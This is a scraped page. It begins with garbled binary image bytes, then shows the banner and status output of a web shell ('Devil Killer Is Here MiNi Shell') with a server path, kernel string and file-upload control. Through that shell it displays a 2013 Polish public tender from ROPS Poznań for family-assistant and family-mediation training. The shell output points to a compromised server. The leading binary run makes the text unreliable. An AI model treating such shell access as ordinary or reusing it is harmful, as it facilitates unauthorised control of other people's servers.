JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130121/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130121/11133-N-2013.html

<p class="kh_header"><b>Poznań: Część 1 - Zorganizowanie i przeprowadzenia szkolenia pod nazwą:
Asystent rodziny
Część 2 - Zorganizowanie i przeprowadzenia szkolenia pod nazwą:
 Mediacje rodzinne</b><br>
<b>Numer ogłoszenia: 11133 - 2013; data zamieszczenia: 21.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Regionalny Ośrodek Polityki Społecznej w Poznaniu , ul. Nowowiejskiego 11, 61-731 Poznań, woj. wielkopolskie, tel. 61 8567-300, faks 61 8515-635.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rops.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Część 1 - Zorganizowanie i przeprowadzenia szkolenia pod nazwą:
Asystent rodziny
Część 2 - Zorganizowanie i przeprowadzenia szkolenia pod nazwą:
 Mediacje rodzinne.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część 1 Zorganizowanie i przeprowadzenia szkolenia pod nazwą: Asystent rodziny
Cel szkolenia: Celem szkolenia jest przygotowanie osób do pełnienia roli zawodowej asystenta rodziny, poznanie praw i obowiązków, zadań i uprawnień jakie stoją przed asystentem rodziny, poznanie metod pracy z rodziną dysfunkcyjną oraz zdobycie praktycznych umiejętności udzielania pomocy i odpowiedniego wsparcia poszczególnym członkom rodziny.
Zakres tematyczny: 
a)	wybrane zagadnienia z prawa rodzinnego, administracyjnego, karnego, cywilnego, zabezpieczenia społecznego oraz prawa pracy;
b)	wybrane elementy pedagogiki, psychologii rozwojowej i wychowawczej, z uwzględnieniem problemów dotyczących rozwoju dziecka i wpływu sytuacji kryzysowych w rodzinie na zachowanie i rozwój dziecka;
c)	regulacje prawne w zakresie wspierania rodziny i systemu pieczy zastępczej;
d)	zadania i uprawnienia asystenta rodziny;
e)	etyka pracy asystenta rodziny;
f)	analiza własnych możliwości i ograniczeń w wykonywaniu zadań asystenta rodziny;
g)	komunikacja interpersonalna;
h)	metodyka pracy asystenta;
i)	definicja rodziny, jej struktura, funkcje oraz potrzeby i problemy;
j)	charakterystyka problemów rodziny, w tym:
- problemy destrukcyjne zachowań dziecka i rodziców,
- nieprawidłowe postawy rodzicielskie,
- problemy wychowawcze,
- problemy w pełnieniu ról społecznych, bezrobocie, uzależnienia, choroby psychicznej;
k)	analiza potrzeb i problemów rodziny;
l)	sporządzanie planu pracy z rodziną;
m)	doskonalenie umiejętności opiekuńczo-wychowawczych rodziny, umiejętności radzenia sobie w sytuacjach stwarzających trudności wychowawcze oraz w wypełnianiu ról społecznych;
n)	problemy wynikające z opieki nad niepełnosprawnym dzieckiem;
o)	organizowanie wspomagania rozwoju dziecka z problemami emocjonalnymi i zaburzeniami zachowania;
p)	problematyka mediacji w rodzinie;
q)	elementy ekonomii i organizacji gospodarstwa domowego;
r)	zagadnienia dotyczące uprawnień w zakresie wsparcia osób niepełnosprawnych;
s)	edukacja zdrowotna;
t)	problematyka interwencji kryzysowej w rodzinie;
u)	organizacja czasu wolnego dzieci i młodzieży;
v)	pielęgnacja niemowląt i dzieci;
w)	pomoc w funkcjonowaniu rodziny w środowisku lokalnym;
x)	współpraca asystenta z rodzinami oraz służbami wspierającymi rodzinę;
y)	zapoznanie się z systemem funkcjonowania instytucji prowadzącej pracę z rodziną, w formie praktyk w tej instytucji.
Termin realizacji szkolenia: Całość szkolenia musi zostać zrealizowana do 30 września 2013r. 
Sposób organizacji zajęć i praktyk: Wykonawcy ubiegający się o realizację niniejszego zamówienia  zobowiązują się zorganizować i przeprowadzić szkolenie dla 20 osób w jednej grupie, w wymiarze 230 godzin dydaktycznych (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), w tym 30 godzin z zakresu analizy własnych możliwości i ograniczeń w wykonywaniu zadań asystenta rodziny i 30 godzin praktyk w instytucji prowadzącej pracę z rodziną.
Szkolenie realizowane będzie w cyklu 11 trzydniowych (21 godzinnych) zjazdów wraz z zapewnieniem uczestnikom poszczególnych zjazdów dowozu, zakwaterowania oraz wyżywienia.
Wykonawca zapewni Uczestnikom szkolenia realizację praktyk w instytucji prowadzącej pracę z dzieckiem i rodziną. Warunkiem otrzymania zaświadczenia o ukończeniu szkolenia jest zakończenie udziału w zajęciach i zrealizowanie praktyk w wymiarze minimum 30 godzin. Wykonawca wskaże co najmniej dwie instytucje, jednak nie więcej niż trzy w których planowane są praktyki, oraz przedstawi program praktyk.
Materiały szkoleniowe: Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 5 dni przed podpisaniem umowy. 
Rekrutacja i obsługa administracyjna: Współpraca z Zamawiającym w zakresie naboru kandydatów na szkolenie i tworzenie listy uczestników oznacza:
-	nawiązanie kontaktu Wykonawcy z jednostkami pomocy i integracji społecznej w Wielkopolsce i na podstawie otrzymanych tą drogą zgłoszeń przeprowadzenie wstępnej kwalifikacji uczestników szkolenia oraz sporządzenie listy kandydatów do grupy, 
-	przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia pierwszego zjazdu, 
-	poinformowanie kandydatów; po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, o zakwalifikowaniu się na szkolenie. 
Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego (baza e-mail jednostek pomocy i integracji społecznej w Wielkopolsce).
Zamawiający prowadzi działania wspierające działania Wykonawcy w formie ogłoszeń, listów oraz informacji na stronie internetowej. Mają one na celu promowanie szkolenia i informowanie o szkoleniu jednostek pomocy społecznej w Wielkopolsce.
Organizacja szkolenia
Dojazd: Wykonawca jest zobowiązany zorganizować dojazd uczestników:
- pierwszego dnia z miejsca zbiórki uczestników szkolenia do miejsca w którym realizowane będzie szkolenie oraz 
-  po zakończeniu szkolenia powrót do miejsca zbiórki. 
Zakwaterowanie: Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno-szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym w woj. wielkopolskim, w tym w mieście Poznaniu. 
Sale szkoleniowe: Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. 
Wyżywienie: Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom: 
- pierwszego dnia - obiad dwudaniowy z napojem, kolację,
- drugiego dnia - śniadanie, obiad dwudaniowy z napojem, kolację,
- trzeciego dnia - śniadanie, obiad dwudaniowy z napojem,
- 2 serwisy konferencyjne w każdym dniu szkolenia, składające się z kawy, herbaty, wody mineralnej, soków, owoców; np. jabłko lub banan, wyrobów cukierniczych,
- zorganizowanie kolacji integracyjnej podczas pierwszego dnia szkolenia.

Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku Nr 1.1. do SIWZ.

 Część 2 Zorganizowanie i przeprowadzenia szkolenia pod nazwą: Mediacje rodzinne
Cel szkolenia: Celem szkolenia jest przygotowanie uczestników do pełnienia roli mediatora rodzinnego poprzez nabycie wiedzy teoretycznej i umiejętności praktycznych z zakresu: wspomagania rozwiązywania konfliktów, skutecznej komunikacji, negocjacji i mediacji. Szkolenie ukierunkowane jest na wykorzystanie mediacji w systemie pomocy dziecku i rodzinie.


Zakres tematyczny:
a)	 podstawy psychologii konfliktu w rodzinie i jej otoczeniu;
b)	wskazania i przeciwwskazania do podjęcia mediacji (diagnoza sporu, analiza gotowości stron do mediacji i postępowanie w przypadkach przeciwwskazanych, ocena rodziny pod kątem zagrożenia przemocą);
c)	podstawowe założenia mediacji rodzinnych;
d)	prawo w mediacjach rodzinnych;
e)	prawidłowa komunikacja;
f)	metody, techniki i narzędzia w pracy mediatora rodzinnego;
g)	etapy mediacji i zadania mediatora w poszczególnych fazach; 
h)	ugoda mediacyjna - cele i jej zadania (aspekt prawny oraz psychologiczny);
i)	etyka pracy mediatora;
j)	zarys procedur mediacyjnych w sprawach karnych, cywilnych i osób nieletnich.

Termin realizacji szkolenia: Pierwszy zjazd szkolenia musi zostać zrealizowany, tj. zakończony w terminie do 15 kwietnia 2013 r. Całość szkolenia musi zostać zrealizowana do 30 września 2013 r. Informacja o terminach poszczególnych zjazdów zostanie przekazana Zamawiającemu nie później niż 5 dni przed podpisaniem umowy.

Sposób organizacji szkolenia: Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić szkolenie dla 40 osób, w podziale na trzy grupy, w wymiarze 105 godzin dydaktycznych dla każdej grupy (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut). Szkolenie realizowane będzie w cyklu 5 trzydniowych (21 godzinnych) zjazdów wraz z zapewnieniem uczestnikom poszczególnych zjazdów dowozu, zakwaterowania oraz wyżywienia. Zajęcia będą prowadzone przez dwóch szkoleniowców jednocześnie. 
Szkolenie powinno zakończyć się egzaminem, którego zakres wynikać będzie ze zrealizowanego materiału.
Przystąpienie do egzaminu nie jest obowiązkowe. Uczestnik, który przystąpi do egzaminu otrzyma zaświadczenie o ukończeniu szkolenia wraz z informacją o wyniku egzaminu. Uczestnik, który nie przystąpi do egzaminu otrzyma zaświadczenie o ukończeniu szkolenia.

Materiały szkoleniowe: Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 5 dni przed podpisaniem umowy. 

Rekrutacja i obsługa administracyjna: Współpraca z Zamawiającym w zakresie naboru kandydatów na szkolenie i tworzenie listy uczestników oznacza:
-	nawiązanie kontaktu Wykonawcy z jednostkami pomocy i integracji społecznej w Wielkopolsce i na podstawie otrzymanych tą drogą zgłoszeń przeprowadzenie wstępnej kwalifikacji uczestników szkolenia oraz sporządzenie listy kandydatów do grupy, 
-	przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia pierwszego zjazdu, 
-	poinformowanie kandydatów; po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, o zakwalifikowaniu się na szkolenie. 
Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego (baza e-mail jednostek pomocy i integracji społecznej w Wielkopolsce).
Zamawiający prowadzi działania wspierające działania Wykonawcy w formie ogłoszeń, listów oraz informacji na stronie internetowej. Mają one na celu promowanie szkolenia i informowanie o szkoleniu jednostek pomocy społecznej w Wielkopolsce.

Organizacja szkolenia
Dojazd: Wykonawca jest zobowiązany zorganizować dojazd uczestników na każdy zjazd:
- pierwszego dnia zjazdu z miejsca zbiórki uczestników szkolenia do miejsca, w którym realizowane będzie szkolenie oraz 
-  po zakończeniu zjazdu powrót do miejsca zbiórki. 
Zakwaterowanie: Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników zjazdów w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno - szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym w woj. wielkopolskim, w tym w mieście Poznaniu. 
Sale szkoleniowe: Wykonawca powinien zapewnić 
uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. 
Wyżywienie: Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom podczas zjazdu: 
- pierwszego dnia - obiad dwudaniowy z napojem oraz kolację,
- drugiego dnia - śniadanie, obiad dwudaniowy z napojem, kolację,
- trzeciego dnia - śniadanie, obiad dwudaniowy z napojem,
- 2 serwisy konferencyjne w każdym dniu szkolenia, składające się z kawy, herbaty, wody mineralnej, soków, owoców; np. jabłko lub banan, wyrobów cukierniczych,
- zorganizowanie kolacji integracyjnej podczas pierwszego zjazdu.

Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku Nr 1.2. do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 60.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości: 
dla Części 1 - 5 000,00 zł (słownie: pięć tysięcy złotych 00/100), 
dla Części 2 - 6 000,00  zł (słownie: sześć tysięcy złotych 00/100). 
Wadium wnosi się pod rygorem wykluczenia z postępowania przed upływem terminu składania ofert, w jednej lub kilku z niżej wymienionych form:
- w pieniądzu, przelewem na rachunek bankowy:
BGŻ S.A. OO Poznań
Rachunek nr 60 2030 0045 1110 0000 0234 9820
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Jeżeli Wykonawca wnosi wadium w formie pieniężnej, wymagana kwota powinna znajdować się na rachunku zamawiającego przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, dotyczące: posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania. Wykonawca złoży:
W zakresie części 1 dysponują programem szkolenia z zakresu Asystenta rodziny, który jest zgodny z Ustawą o wspieraniu rodziny i systemie pieczy zastępczej nad dzieckiem z dn. 9 czerwca 2011r., z rozporządzeniem MPiPS z dnia 9 grudnia 2011r. w sprawie szkoleń dla asystentów rodziny, 
- posiadają decyzję MPiPS zatwierdzającą ww. program do realizacji,
- posiadają możliwość wydania zaświadczenia o ukończeniu ww. szkolenia
Wykonawca złoży: Załącznik Nr 10 do SIWZ wraz z kserokopią posiadanej decyzji MPiPS zatwierdzającą program szkolenia z zakresu Asystenta rodziny, który jest zgodny z Ustawą o wspieraniu rodziny i systemie pieczy zastępczej nad dzieckiem z dn. 9 czerwca 2011r. do realizacji jako dokument potwierdzający

W zakresie części 2 Wykonawca złoży: - oświadczenie o spełnianiu warunków udziału w postępowaniu (Załącznik Nr 3 do SIWZ)
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana w oparciu o oświadczenie Wykonawcy wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali z należytą starannością, a w przypadku świadczeń okresowych lub ciągłych również wykonują: 
w zakresie Części 1
- co najmniej 5 trzydniowych szkoleń dla co najmniej 20 osób każde, w zakresie tematycznym dotyczącym pracy z rodziną (Załącznik Nr 6.1. do SIWZ),. wraz z dokumentem potwierdzającym, iż usługi wskazane w wykazie zostały wykonane lub są wykonywane należycie (np. referencje lub protokół odbioru usługi - obejmujące co najmniej wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował/realizuje zamówienie, którego dokumenty dotyczą, wskazanie podmiotu, na rzecz którego realizowane było/jest zamówienie, opinię tego podmiotu, podpisaną przez umocowanego przedstawiciela, stwierdzającą, że zamówienie zostało wykonane/jest wykonywane należycie); 

w zakresie Części 2
1) co najmniej pięć odrębnych szkoleń, tj. zrealizowanych na podstawie oddzielnych umów, 
w wymiarze czasowym minimum 20 godzin każde, w zakresie tematycznym dotyczącym mediacji rodzinnych (Załącznik Nr 6.2. do SIWZ, część a),
2) co najmniej dwa odrębne, tj. zrealizowane na podstawie oddzielnych umów, minimum dwudniowe szkolenia wraz z zapewnieniem uczestnikom zakwaterowania i wyżywienia, każde o wartości co najmniej 100.000,00 złotych brutto, (Załącznik Nr 6.2. do SIWZ, część b). 
Wykazane szkolenia mogą spełniać oba ww. warunki.
wraz z dokumentem potwierdzającym, iż usługi wskazane w wykazie zostały wykonane lub są wykonywane należycie (np. referencje lub protokół odbioru usługi - obejmujące co najmniej wskazanie, że Wykonawca składający ofertę w niniejszym postępowaniu realizował/realizuje zamówienie, którego dokumenty dotyczą, wskazanie podmiotu, na rzecz którego realizowane było/jest zamówienie, opinię tego podmiotu, podpisaną przez umocowanego przedstawiciela, stwierdzającą, że zamówienie zostało wykonane/jest wykonywane należycie); 



Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana w oparciu o dokumenty Wykonawcy wg formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, dotyczące: dysponowania odpowiednim potencjałem technicznym. W odniesieniu do wskazanego warunku Wykonawca złoży wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy w celu realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami, sporządzony według wzoru stanowiącego załącznik Nr 8 do SIWZ. Ocena zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy dysponują osobami, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami tj.: 
w zakresie Części 1
tj.: 1). dysponuje co najmniej czteroosobowym zespołem specjalistów, którzy (zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 9 grudnia 2011r. w sprawie szkoleń na asystenta rodziny):
c)	posiadają co najmniej 3 letnie udokumentowane doświadczenie w prowadzeniu szkoleń
d)	ukończone jednolite studia magisterskie lub studia drugiego stopnia
- z zakresu problematyki odpowiadającej tematycznie zagadnieniom, z których będzie prowadzone szkolenie.
Szkolenie z zakresu tematycznego zawartego w SIWZ pkt. 3.2 j), k), l), m), q), u), w) mogą prowadzić również osoby które:
c)	posiadają co najmniej 3 letnie udokumentowane doświadczenie w prowadzeniu szkoleń z zakresu problematyki odpowiadającej tematycznie zagadnieniom, z których będzie prowadzone szkolenie
d)	posiadają co najmniej 5-letnia praktykę w pracy z dziećmi i rodziną
(Załącznik Nr 7.1. do SIWZ, część a),
2). dysponuje co najmniej dwoma osobami, które:
a)będą koordynować działania i obsługę w zakresie rekrutacji uczestników szkolenia, 
b)będą sprawowały opiekę nad grupą w trakcie i na miejscu szkolenia,
c)pozyskają i rzetelnie przygotują dokumentację projektową. 
(Załącznik Nr 7.1. do SIWZ, część b),
w zakresie Części 2
tj.:1) dysponuje co najmniej czteroosobowym zespołem specjalistów, którzy posiadają:
- wykształcenie wyższe
- stałą praktykę mediacyjną: minimum dwuletnią (minimum 6 spraw rocznie),
- doświadczenie szkoleniowe: minimum 200 godzin lekcyjnych z zakresu mediacji rodzinnych, 
- zostali wpisani na listę zawodową instytucji lub stowarzyszenia zrzeszającą stałych mediatorów (Załącznik Nr 7.2. do SIWZ, część a),
2) dysponuje co najmniej dwoma osobami, które:
 a) będą koordynować działania i obsługę w zakresie rekrutacji uczestników szkolenia, 
 b) będą sprawowały opiekę nad grupą w trakcie i na miejscu szkolenia,
c) pozyskają i rzetelnie przygotują dokumentację projektową (Załącznik Nr 7.2. do SIWZ, część b).
Ocena zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają warunki udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy, dotyczące sytuacji ekonomicznej i finansowej. W odniesieniu do wskazanego warunku Wykonawca złoży oświadczenie o spełnieniu tego warunku (Załącznik Nr 3 do SIWZ). Ocena zostanie dokonana wg formuły spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

